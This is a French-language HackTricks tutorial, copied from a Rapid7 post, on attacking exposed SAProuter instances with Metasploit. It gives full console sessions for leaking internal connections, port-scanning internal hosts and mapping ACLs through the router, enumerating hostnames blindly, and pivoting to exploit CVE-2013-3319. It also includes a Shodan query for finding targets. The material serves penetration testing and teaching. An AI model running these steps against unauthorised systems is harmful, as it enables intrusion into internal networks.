hacktricks/network-services-pentesting/3299-pentesting-saprouter.md
2023-06-03 13:10:46 +00:00

340 lines
23 KiB
Markdown

<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et au [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
Copie de: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
# Percer SAProuter avec Metasploit
Saprouter est essentiellement un proxy inverse pour les systèmes SAP, généralement situé entre Internet et les systèmes SAP internes. Son objectif principal est de permettre un accès contrôlé depuis des hôtes sur Internet vers les systèmes SAP internes, car il permet un contrôle plus fin des protocoles SAP qu'un pare-feu typique.
Cela signifie que saprouter finit généralement par être exposé à Internet, en permettant le port TCP entrant 3299 vers l'hôte saprouter sur les pare-feu de l'organisation. Et à partir du saprouter, il devrait au moins être possible d'atteindre un serveur SAP interne. Cela en fait une cible très intéressante, car il peut fournir un moyen d'accéder au réseau "à haute valeur".
La figure suivante montre une configuration réseau de base, que nous utiliserons pour les exemples:
![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg)
Tout d'abord, nous commencerons par effectuer une analyse de service SAP de l'adresse IP exposée, en utilisant le module [`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery), dans ce cas, 1.2.3.101.
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_service_discovery) > run
[*] [SAP] Beginning service Discovery '1.2.3.101'
[+] 1.2.3.101:3299 - SAP Router OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Le scan nous montre que l'hôte exécute un routeur SAP sur le port TCP attendu 3299. Nous pouvons maintenant creuser plus profondément et essayer d'obtenir des informations à partir du saprouter. S'il a été mal configuré, et souvent c'est le cas, il peut être possible d'obtenir des informations internes, telles que des connexions établies via le saprouter vers des hôtes internes. À cette fin, nous utilisons le module [`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) :
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_router_info_request) > run
[+] 1.2.3.101:3299 - Connected to saprouter
[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request
[+] 1.2.3.101:3299 - Got INFO response
[+] Working directory : /opt/sap
[+] Routtab : ./saprouttab
[SAP] SAProuter Connection Table for 1.2.3.101
===================================================
Source Destination Service
------ ----------- -------
1.2.3.12 192.168.1.18 3200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Ainsi, à partir de la sortie, nous voyons que quelqu'un sur Internet \(1.2.3.12\) est connecté à un hôte interne \(192.168.1.18\) sur le port 3200. Le port 3200 est un port SAP commun pour le protocole DIAG \(c'est là que l'application SAP GUI se connecte aux serveurs SAP\). Nous obtenons également des informations sur le schéma d'adressage IP interne, ils utilisent très probablement le réseau 192.168.1.0/24, ou un sous-réseau dans ce réseau.
**Énumération des hôtes et services internes**
Avec ces informations, nous sommes maintenant en mesure de commencer à scanner le réseau interne. Comme saprouter fonctionne comme un proxy, nous allons tenter de nous y connecter et de demander des connexions à des hôtes et des ports internes, et voir les réponses de saprouter. Cela peut donner plus d'informations sur les hôtes internes, les services et les ACL, en fonction de la configuration de saprouter. Nous utiliserons le module [`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) à cette fin.
Le module se connecte au saprouter et demande des connexions à d'autres hôtes \(définis dans l'option TARGETS\) sur des ports TCP spécifiques. Il analyse ensuite les réponses et comprend si la connexion demandée est possible ou non. Ce module fournit quelques options qui peuvent être utilisées :
```text
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
INSTANCES 00-99 no SAP instance numbers to scan (NN in PORTS definition)
MODE SAP_PROTO yes Connection Mode: SAP_PROTO or TCP (accepted: SAP_PROTO, TCP)
PORTS 32NN yes Ports to scan (e.g. 3200-3299,5NN13)
RESOLVE local yes Where to resolve TARGETS (accepted: remote, local)
RHOST yes SAPRouter address
RPORT 3299 yes SAPRouter TCP port
TARGETS yes Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.
```
Au minimum, vous devrez définir l'adresse IP du saprouter, dans le cas de l'exemple, 1.2.3.101. Ensuite, définissez TARGETS avec les adresses du réseau interne que vous souhaitez scanner, et enfin définissez PORTS avec les ports TCP à scanner.
Le module fournit également une option INSTANCES qui permet de simplifier la définition de l'option PORTS. Les installations SAP prennent en charge plusieurs instances, fournissant des services similaires, de sorte que chaque instance a des ports TCP assignés. Par exemple, l'instance SAP 00 aura le service de dispatcher SAP \(où se connecte SAP GUI\) sur le port 3200 et l'instance 01 sur le port 3201. L'option PORTS prend en charge un "joker" qui est "NN" qui sera remplacé par le numéro d'instance, permettant ainsi de scanner les ports pour toutes les instances définies. Ainsi, si nous voulons scanner les instances de 00 à 50, nous pouvons définir les variables INSTANCES et PORTS de cette manière:
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
```
Avec ce paramètre, le module va scanner les ports dans la plage de 3200 à 3250.
Dans la source du module, vous avez des informations sur les ports par défaut couramment utilisés sur les systèmes SAP, que nous allons maintenant utiliser pour le scan :
```text
msf > use auxiliary/scanner/sap/sap_router_portscanner
msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_router_portscanner
msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101
RHOST => 1.2.3.101
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18
TARGETS => 192.168.1.18
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3201 closed SAP Dispatcher sapdp01
192.168.1.18 3200 open SAP Dispatcher sapdp00
192.168.1.18 50013 open SAP StartService [SOAP] sapctrl00
[*] Auxiliary module execution completed
```
Nous pouvons essayer de comprendre pourquoi certaines connexions ne sont pas autorisées à travers le saprouter en utilisant l'option VERBOSE. Lorsque VERBOSE est défini sur true, nous sommes en mesure de voir la réponse du saprouter et de cartographier la liste de contrôle d'accès définie.
Nous allons maintenant scanner les hôtes 192.168.1.18 et 192.168.1.1, mais uniquement sur le port 3200, pour voir si nous pouvons nous connecter aux deux dispatchers SAP :
```text
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18
TARGETS => 192.168.1.1,192.168.1.18
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3200 open SAP Dispatcher sapdp00
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[!] Warning: Service info could be inaccurate
[*] Auxiliary module execution completed
```
Comme vous pouvez le constater, nous savons maintenant que nous ne pouvons pas nous connecter à un autre hôte sur le port 3200, car il est bloqué par l'ACL définie sur le saprouter.
**Cartographie des ACL**
Une chose intéressante à propos du saprouter est qu'il prend en charge deux types de connexions :
* Native - Ces connexions sont simplement des connexions TCP ;
* Protocole SAP - Il s'agit de connexions TCP avec une particularité : le protocole indique que tous les messages commencent par 4 octets indiquant la longueur du contenu suivant.
Le protocole SAP est spécifique au saprouter et c'est ce que l'interface utilisateur SAP utilise pour se connecter au port SAP DIAG via le saprouter. Le protocole natif est utilisé pour permettre à d'autres types de connexions de passer par le saprouter.
Ce module permet de spécifier le type de connexion à tester lors de l'analyse dans l'option MODE. La valeur par défaut est le protocole SAP, qui est le plus probable à être utilisé en production. Cependant, il n'est pas rare de trouver d'autres services autorisés à travers le saprouter, où l'ACL permettra des connexions natives \(TCP\) à travers.
Nous pouvons définir le MODE sur TCP afin de vérifier si ce type de connexions est autorisé. Nous allons maintenant analyser les hôtes internes, à la fois sur le port 3200 \(SAP DIAG\) et 80 \(HTTP\), avec VERBOSE défini sur true, sur les deux instances 00 et 01 et voir ce qui se passe :
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
MODE => TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
PORTS => 80,32NN
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:80 - TCP OPEN
[-] 192.168.1.18:3200 - blocked by ACL
[+] 192.168.1.18:3201 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 80 open
192.168.1.18 3201 open SAP Dispatcher sapdp01
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[+] 192.168.1.1:3201 - TCP OPEN
[+] 192.168.1.1:80 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.1 3201 open SAP Dispatcher sapdp01
192.168.1.1 80 open
[*] Auxiliary module execution completed
```
À partir de la sortie et des informations précédentes, nous savons maintenant que la liste de contrôle d'accès (ACL) ressemble à ceci :
* Autoriser les connexions TCP de n'importe quel hôte vers 192.168.1.1 sur le port 80
* Autoriser les connexions TCP de n'importe quel hôte vers 192.168.1.18 sur le port 80
* Autoriser les connexions TCP de n'importe quel hôte vers 192.168.1.1 sur le port 3201
* Autoriser les connexions TCP de n'importe quel hôte vers 192.168.1.18 sur le port 3201
* Autoriser les connexions SAP de n'importe quel hôte vers 192.168.1.18 sur le port 3200
**Énumération aveugle des hôtes internes**
Si vous vous souvenez, nous avons commencé par obtenir des informations à partir du saprouter qui nous a permis de connaître l'adresse IP d'un hôte interne, et nous avons continué à partir de là. Mais que se passe-t-il si le saprouter ne nous fournit pas cette information ?
Une option consiste à simplement commencer à scanner les espaces d'adresses privées et voir ce qui se passe. L'autre consiste à énumérer aveuglément les hôtes par nom d'hôte.
Les saprouters sont capables de résoudre les noms d'hôtes que nous leur demandons de connecter. Saprouter est également assez gentil pour nous faire savoir quelles sont les erreurs lorsqu'il échoue à se connecter (vous pouvez en fait voir les réponses brutes en décommentant la ligne 242 dans la source du module).
Grâce à cette fonctionnalité, nous sommes en mesure d'énumérer les hôtes internes par nom d'hôte et d'essayer d'aller directement à l'essentiel !
Pour cela, nous devons définir l'option RESOLVE sur "remote". Dans ce cas, le module demandera une connexion aux CIBLES définies, sans les résoudre localement, et nous pourrons essayer de deviner les hôtes internes et éventuellement nous y connecter sans jamais connaître leurs adresses IP.
Points importants à retenir lors de l'énumération aveugle des hôtes :
* Définir VERBOSE sur true ;
* Nous obtiendrons plus d'informations de saprouter si MODE est défini sur SAP_PROTO ;
* Il suffit de définir un seul port à scanner, car nous ne sommes intéressés pour l'instant que par les informations envoyées par saprouter (essayez 3200) ;
* Les résultats varieront en fonction de l'ACL configurée. Malheureusement, les connexions bloquées ne nous donneront pas beaucoup d'informations.
Dans cet exemple, nous essaierons les noms d'hôtes sap, sapsrv et sapsrv2.
```text
msf auxiliary(sap_router_portscanner) > set RESOLVE remote
RESOLVE => remote
msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO
MODE => SAP_PROTO
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2
TARGETS => sap,sapsrv,sapsrv2
msf auxiliary(sap_router_portscanner) > set PORTS 3200
PORTS => 3200
msf auxiliary(sap_router_portscanner) > run
[*] Scanning sap
[-] sap:3200 - unknown host
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv
[-] sapsrv:3200 - host unreachable
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv2
[+] sapsrv2:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
sapsrv2 3200 open SAP Dispatcher sapdp00
[*] Auxiliary module execution completed
```
À partir de la sortie, nous voyons que l'hôte "sap" n'existe pas, mais que l'hôte "sapsrv" existe, bien qu'il soit injoignable, et que "sapsrv2" existe et que nous pouvons nous connecter au port 3200.
Cette technique peut également être utilisée pour essayer de trouver d'autres hôtes sur le réseau, non liés à SAP, il suffit d'utiliser des noms d'hôtes courants, tels que smtp, exchange, pdc, bdc, fileshare, intranet, ou tout autre nom d'hôte que vous pourriez avoir dans votre sac de trucs.
**La dernière ligne droite**
Maintenant que nous avons obtenu toutes ces informations, nous connaissons les hôtes internes disponibles, les services autorisés et les protocoles que nous pouvons utiliser pour percer le saprouter, nous pouvons en fait nous connecter aux serveurs internes et procéder à notre pentest.
Metasploit nous offre une excellente façon d'utiliser saprouter comme proxy, en utilisant l'option Proxies, grâce à Dave Hartley \([@nmonkee](http://twitter.com/nmonkee)\).
À ce stade, nous voulons commencer à recueillir des informations sur le serveur SAP interne que nous avons découvert sur l'hôte 192.168.1.18. À titre d'exemple, nous utiliserons le module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) qui exploite CVE-2013-3319 et nous donne des détails sur le système d'exploitation sur lequel le serveur fonctionne en interrogeant le service SAP Host Control sur le port 1128 via une requête SOAP non authentifiée. Nous allons pivoter à travers le saprouter, en utilisant le support de proxy dans metasploit :
![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg)
```text
msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
Proxies => sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
RHOSTS => 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
[+] 192.168.1.18:1128 - Information retrieved successfully
[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Si tout s'est bien passé, vous aurez une belle sortie du module dans le butin contenant des informations internes intéressantes de l'hôte SAP cible (comme des noms d'utilisateur internes que vous pouvez ensuite essayer de forcer par la méthode brute).
Le pivotement peut (et devrait!) être utilisé pour exécuter d'autres modules contre des hôtes internes, pas seulement des systèmes SAP!
**Conclusion**
Nous avons vu comment il est possible d'exploiter des configurations saprouter faibles qui peuvent permettre l'accès à des hôtes internes depuis Internet, tout cela en utilisant uniquement le support de metasploit pour le pentesting des systèmes SAP.
J'espère que cet article pourra aider à éclairer à la fois les risques associés aux déploiements saprouter, ainsi que la sécurité SAP en général.
**Références**
* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/)
* \[[http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nun ez Di Croce - SAProuter .pdf\]\([http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nunez Di Croce - SAProuter .pdf\)
* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124)
* [http://help.sap.com/saphelp\_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/f rameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm)
* [http://help.sap.com/saphelp\_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767 /content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm)
* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/)
* [SAP Service Discovery \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery)
* [SAPRouter Admin Request \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request)
* [CVE-2013-3319 SAP Host Agent Information Disclosure \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem)
* [SAPRouter Port Scanner \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner)
# Shodan
* `port:3299 !HTTP Network packet too big`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Travaillez-vous dans une entreprise de cybersécurité? Voulez-vous voir votre entreprise annoncée dans HackTricks? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au repo [hacktricks](https://github.com/carlospolop/hacktricks) et [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>